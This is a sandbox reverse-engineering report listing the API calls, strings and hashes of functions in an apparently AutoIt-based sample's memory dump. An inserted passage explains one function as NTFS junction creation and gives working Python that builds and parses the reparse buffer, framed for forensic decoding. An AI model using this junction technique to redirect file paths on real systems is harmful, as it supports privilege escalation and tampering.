                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00B079C6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00B079D1
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00B079DC
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00B079E7
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00B079F2
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00B079FD
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00B07A08
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00B07A13
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00B07A1E
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00B07A29
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00B07A34
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00B07A3F
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00B07A4A
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00B07A55
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00B07A60
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00B07A6B
                                                              • GetCursorInfo.USER32(?), ref: 00B07A7B
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              APIs
                                                                • Part of subcall function 00ACE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00ABC8B7,?,00002000,?,?,00000000,?,00AB419E,?,?,?,00B4DC00), ref: 00ACE984
                                                                • Part of subcall function 00AB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB53B1,?,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB662F
                                                              • __wsplitpath.LIBCMT ref: 00ABC93E
                                                                • Part of subcall function 00AD1DFC: __wsplitpath_helper.LIBCMT ref: 00AD1E3C
                                                              • _wcscpy.LIBCMT ref: 00ABC953
                                                              • _wcscat.LIBCMT ref: 00ABC968
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ABC978
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00ABCABE
                                                                • Part of subcall function 00ABB337: _wcscpy.LIBCMT ref: 00ABB36F
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B1CEFB
                                                              • DestroyWindow.USER32(?,?), ref: 00B1CF73
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B1CFF4
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B1D016
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1D025
                                                              • DestroyWindow.USER32(?), ref: 00B1D042
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AB0000,00000000), ref: 00B1D075
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1D094
                                                              • GetDesktopWindow.USER32 ref: 00B1D0A9
                                                              • GetWindowRect.USER32(00000000), ref: 00B1D0B0
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B1D0C2
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B1D0DA
                                                                • Part of subcall function 00ACB526: GetWindowLongW.USER32(?,000000EB), ref: 00ACB537
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                              • String ID: 0$tooltips_class32
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DragQueryPoint.SHELL32(?,?), ref: 00B1F37A
                                                                • Part of subcall function 00B1D7DE: ClientToScreen.USER32(?,?), ref: 00B1D807
                                                                • Part of subcall function 00B1D7DE: GetWindowRect.USER32(?,?), ref: 00B1D87D
                                                                • Part of subcall function 00B1D7DE: PtInRect.USER32(?,?,00B1ED5A), ref: 00B1D88D
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B1F3E3
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B1F3EE
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B1F411
                                                              • _wcscat.LIBCMT ref: 00B1F441
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B1F458
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B1F471
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00B1F488
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00B1F4AA
                                                              • DragFinish.SHELL32(?), ref: 00B1F4B1
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B1F59C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: 3c2ab0307464f9dacaa5861881b7a2f382ec40ec166854de4f87d96cc2546be7
                                                              • Instruction ID: 72bbfa29ef38b73a20aca48ef497e93ed0c6178cd53db77ecebbc0b193749202
                                                              • Opcode Fuzzy Hash: 3c2ab0307464f9dacaa5861881b7a2f382ec40ec166854de4f87d96cc2546be7
                                                              • Instruction Fuzzy Hash: B5613775108301AFC301EF64DC86EAFBBE8FB89710F504A1EB595932A1DB70DA59CB52
                                                              APIs
                                                              • VariantInit.OLEAUT32(00000000), ref: 00AFAB3D
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00AFAB46
                                                              • VariantClear.OLEAUT32(?), ref: 00AFAB52
                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AFAC40
                                                              • __swprintf.LIBCMT ref: 00AFAC70
                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00AFAC9C
                                                              • VariantInit.OLEAUT32(?), ref: 00AFAD4D
                                                              • SysFreeString.OLEAUT32(00000016), ref: 00AFADDF
                                                              • VariantClear.OLEAUT32(?), ref: 00AFAE35
                                                              • VariantClear.OLEAUT32(?), ref: 00AFAE44
                                                              • VariantInit.OLEAUT32(00000000), ref: 00AFAE80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                              • API String ID: 3730832054-3931177956
                                                              • Opcode ID: 656e3972a41f99ebddd4b44c9875ead2b42f7698519f046bbb37127fc709c1ce
                                                              • Instruction ID: 3e873798e9c30e2c2c25b9e6327066dc577e77cfacf69d2eae772c3b829c0860
                                                              • Opcode Fuzzy Hash: 656e3972a41f99ebddd4b44c9875ead2b42f7698519f046bbb37127fc709c1ce
                                                              • Instruction Fuzzy Hash: C3D1CFB1604119DBDB24AFE5D884BFAB7B5BF14700F248495F60D9B281DB74EC40DBA2
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00B171FC
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B17247
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: ed723b9ed4183ae85f51b149e5ec1619bbd12ad2b69b57fc44afe75ceb3cf5a5
                                                              • Instruction ID: f772d2b4a5036d5029913155995cf5f51e0f3d50b95c1383f1eb276ea86d2f75
                                                              • Opcode Fuzzy Hash: ed723b9ed4183ae85f51b149e5ec1619bbd12ad2b69b57fc44afe75ceb3cf5a5
                                                              • Instruction Fuzzy Hash: 95916D302487019BCB04EF10C991AAEB7E5AF95310F55489DF8966B3A3DF34ED4ACB81
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B1E5AB
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B1BEAF), ref: 00B1E607
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1E647
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1E68C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1E6C3
                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00B1BEAF), ref: 00B1E6CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B1E6DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,00B1BEAF), ref: 00B1E6EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B1E70B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B1E717
                                                                • Part of subcall function 00AD0FA7: __wcsicmp_l.LIBCMT ref: 00AD1030
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 42689072b4f92abb8ca427e0533f9e0dadf03587a30fe363e2cffa608ec0788a
                                                              • Instruction ID: 5c0559fc80e7632bc8dcdc2d50fab44f2764911c70f70ffc5a1163dd5253dd4e
                                                              • Opcode Fuzzy Hash: 42689072b4f92abb8ca427e0533f9e0dadf03587a30fe363e2cffa608ec0788a
                                                              • Instruction Fuzzy Hash: 5B61DE71500215BAEB24DF64DD82FEE7BA8FB18724F604155F921E71D1EB70E980CBA0
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CharLowerBuffW.USER32(?,?), ref: 00AFD292
                                                              • GetDriveTypeW.KERNEL32 ref: 00AFD2DF
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFD327
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFD35E
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFD38C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1148790751-4113822522
                                                              • Opcode ID: 9fd86edf186bc87068cd945eb3d1f909639bc0e1a1bc477c81ce1fcb5e30b693
                                                              • Instruction ID: 0f10f800b05257f6af75facb041185a0676085c70d5bc35b1abc10623d4747d0
                                                              • Opcode Fuzzy Hash: 9fd86edf186bc87068cd945eb3d1f909639bc0e1a1bc477c81ce1fcb5e30b693
                                                              • Instruction Fuzzy Hash: 9A5149715042049FC700EF20C981AAEB7F9EF88758F10495CF995672A2DB31EE05CB82
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00B23973,00000016,0000138C,00000016,?,00000016,00B4DDB4,00000000,?), ref: 00AF26F1
                                                              • LoadStringW.USER32(00000000,?,00B23973,00000016), ref: 00AF26FA
                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00B23973,00000016,0000138C,00000016,?,00000016,00B4DDB4,00000000,?,00000016), ref: 00AF271C
                                                              • LoadStringW.USER32(00000000,?,00B23973,00000016), ref: 00AF271F
                                                              • __swprintf.LIBCMT ref: 00AF276F
                                                              • __swprintf.LIBCMT ref: 00AF2780
                                                              • _wprintf.LIBCMT ref: 00AF2829
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AF2840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 618562835-2268648507
                                                              • Opcode ID: 50b425927d157848b07a891ccee2b308cbdd404bb2bcf5467ce3792580db8ed3
                                                              • Instruction ID: 1b6c2a0d31bf81540c839866fbf454601a1597c509879d74602c6120f8c931f3
                                                              • Opcode Fuzzy Hash: 50b425927d157848b07a891ccee2b308cbdd404bb2bcf5467ce3792580db8ed3
                                                              • Instruction Fuzzy Hash: BC413C72800219BACB14FBE4DE86EEEB77CAF14740F100165F60273092EA746F49DBA1
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AFD0D8
                                                              • __swprintf.LIBCMT ref: 00AFD0FA
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AFD137
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AFD15C
                                                              • _memset.LIBCMT ref: 00AFD17B
                                                              • _wcsncpy.LIBCMT ref: 00AFD1B7
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AFD1EC
                                                              • CloseHandle.KERNEL32(00000000), ref: 00AFD1F7
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00AFD200
                                                              • CloseHandle.KERNEL32(00000000), ref: 00AFD20A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: ec33fc993afc5839b948126c3c9190f0dda52a0766dafa7501bfef291b0af4de
                                                              • Instruction ID: 37c31c0e5f1f6008fe2fc5e16e7de3de7e3578167a985c8e3620db63a4103bb7
                                                              • Opcode Fuzzy Hash: ec33fc993afc5839b948126c3c9190f0dda52a0766dafa7501bfef291b0af4de
                                                              • Instruction Fuzzy Hash: C43181B2500109ABDB21DFA4DC49FEF77BDEF89740F2041B6F60AD2160EB7096458B24
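The function above (GetFullPathNameW, CreateDirectoryW, CreateFileW with dwDesiredAccess 0x40000000 = GENERIC_WRITE and dwFlagsAndAttributes 0x02200000, DeviceIoControl with control code 0x000900A4, the "\??\%s" format string, and RemoveDirectoryW on the failure path) is the standard Win32 sequence for creating an NTFS junction: 0x000900A4 is FSCTL_SET_REPARSE_POINT and 0x02200000 is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT. The Python below is an added example, not code from this report or from the sample; it reconstructs the REPARSE_DATA_BUFFER that such a DeviceIoControl call passes for a mount point and parses one back, so a buffer recovered from a memory dump of the call's input can be decoded offline. The target path is constructed sample input and no Windows API is called.

```python
import struct

# Constants from the Windows SDK (winioctl.h / winnt.h); the values are fixed.
FILE_DEVICE_FILE_SYSTEM = 0x00000009
METHOD_BUFFERED = 0
FILE_SPECIAL_ACCESS = 0
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000
FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000
MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 16 * 1024


def ctl_code(device_type, function, method, access):
    """CTL_CODE macro from winioctl.h: how the 0x000900A4 in the listing is formed."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# DeviceIoControl control code seen in the listing.
FSCTL_SET_REPARSE_POINT = ctl_code(FILE_DEVICE_FILE_SYSTEM, 41, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
# CreateFileW dwFlagsAndAttributes seen in the listing.
CREATEFILE_FLAGS = FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT


def build_mount_point_buffer(target):
    """Build the REPARSE_DATA_BUFFER that FSCTL_SET_REPARSE_POINT expects for a junction.

    The substitute name is the NT path "\\??\\<target>" (the report's "\\??\\%s" format
    string); the print name is the Win32 path shown to users. Both are UTF-16LE and
    NUL-terminated inside PathBuffer.
    """
    substitute = "\\??\\" + target
    sub_b = substitute.encode("utf-16-le")
    prn_b = target.encode("utf-16-le")
    path_buffer = sub_b + b"\x00\x00" + prn_b + b"\x00\x00"
    # ReparseDataLength covers MountPointReparseBuffer: four USHORTs plus PathBuffer.
    data_len = 8 + len(path_buffer)
    header = struct.pack("<IHH", IO_REPARSE_TAG_MOUNT_POINT, data_len, 0)
    mount = struct.pack("<HHHH", 0, len(sub_b), len(sub_b) + 2, len(prn_b))
    buf = header + mount + path_buffer
    if len(buf) > MAXIMUM_REPARSE_DATA_BUFFER_SIZE:
        raise ValueError("reparse buffer exceeds MAXIMUM_REPARSE_DATA_BUFFER_SIZE")
    return buf


def parse_mount_point_buffer(buf):
    """Decode a mount-point REPARSE_DATA_BUFFER, e.g. one carved from a memory dump."""
    if len(buf) < 16:
        raise ValueError("buffer shorter than the mount point header")
    tag, data_len, _reserved = struct.unpack_from("<IHH", buf, 0)
    if tag != IO_REPARSE_TAG_MOUNT_POINT:
        raise ValueError("not a mount point reparse tag: 0x%08X" % tag)
    if 8 + data_len != len(buf):
        raise ValueError("ReparseDataLength does not match buffer size")
    sub_off, sub_len, prn_off, prn_len = struct.unpack_from("<HHHH", buf, 8)
    path = buf[16:16 + data_len - 8]
    if sub_off + sub_len > len(path) or prn_off + prn_len > len(path):
        raise ValueError("name offsets point outside PathBuffer")
    return {
        "substitute_name": path[sub_off:sub_off + sub_len].decode("utf-16-le"),
        "print_name": path[prn_off:prn_off + prn_len].decode("utf-16-le"),
    }


if __name__ == "__main__":
    # Constructed sample target. On Windows this buffer is what the listed sequence
    # passes as DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, buf, len(buf), ...)
    # on a directory handle opened with GENERIC_WRITE and CREATEFILE_FLAGS.
    sample = build_mount_point_buffer("C:\\Windows\\Temp")
    print(hex(FSCTL_SET_REPARSE_POINT), len(sample), parse_mount_point_buffer(sample))
```

When triaging a sandbox run, a DeviceIoControl with this control code on a handle opened with FILE_FLAG_OPEN_REPARSE_POINT is the event to look for; the function's presence in the AutoIt runtime image alone does not mean the script called it.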
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B1BEF4,?,?), ref: 00B1E754
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E76B
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E776
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E783
                                                              • GlobalLock.KERNEL32(00000000), ref: 00B1E78C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E79B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00B1E7A4
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E7AB
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B1BEF4,?,?,00000000,?), ref: 00B1E7BC
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B3D9BC,?), ref: 00B1E7D5
                                                              • GlobalFree.KERNEL32(00000000), ref: 00B1E7E5
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B1E809
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B1E834
                                                              • DeleteObject.GDI32(00000000), ref: 00B1E85C
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B1E872
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: 3c82fd2f1751c75869e867fce1643ebd35c4d584b9666809e4db413c85f1ffae
                                                              • Instruction ID: 93b7b753d0088a568867673d1799e7556b93f07cd6fbd14c855f8a54648e1624
                                                              • Opcode Fuzzy Hash: 3c82fd2f1751c75869e867fce1643ebd35c4d584b9666809e4db413c85f1ffae
                                                              • Instruction Fuzzy Hash: 39412975600204AFDB119F65EC88EAE7BB8EB89711F204058F916A72A0DB309D41DB20
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 00B0076F
                                                              • _wcscat.LIBCMT ref: 00B00787
                                                              • _wcscat.LIBCMT ref: 00B00799
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B007AE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B007C2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00B007DA
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B007F4
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: fc9967d1a7783baaa6ee2bf03e96ddb09eed4d6c72a4619aaddb6375e4e4abda
                                                              • Instruction ID: c1c1d1195d88ca93971ce5823adab4fd8cc2a670dae431031dfd604f52506510
                                                              • Opcode Fuzzy Hash: fc9967d1a7783baaa6ee2bf03e96ddb09eed4d6c72a4619aaddb6375e4e4abda
                                                              • Instruction Fuzzy Hash: 8C81C4715143419FCB24EF24C584AAEBBE9FBD4300F14886EF486C7291EB35DD448B52
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B1EF3B
                                                              • GetFocus.USER32 ref: 00B1EF4B
                                                              • GetDlgCtrlID.USER32(00000000), ref: 00B1EF56
                                                              • _memset.LIBCMT ref: 00B1F081
                                                              • GetMenuItemInfoW.USER32 ref: 00B1F0AC
                                                              • GetMenuItemCount.USER32(00000000), ref: 00B1F0CC
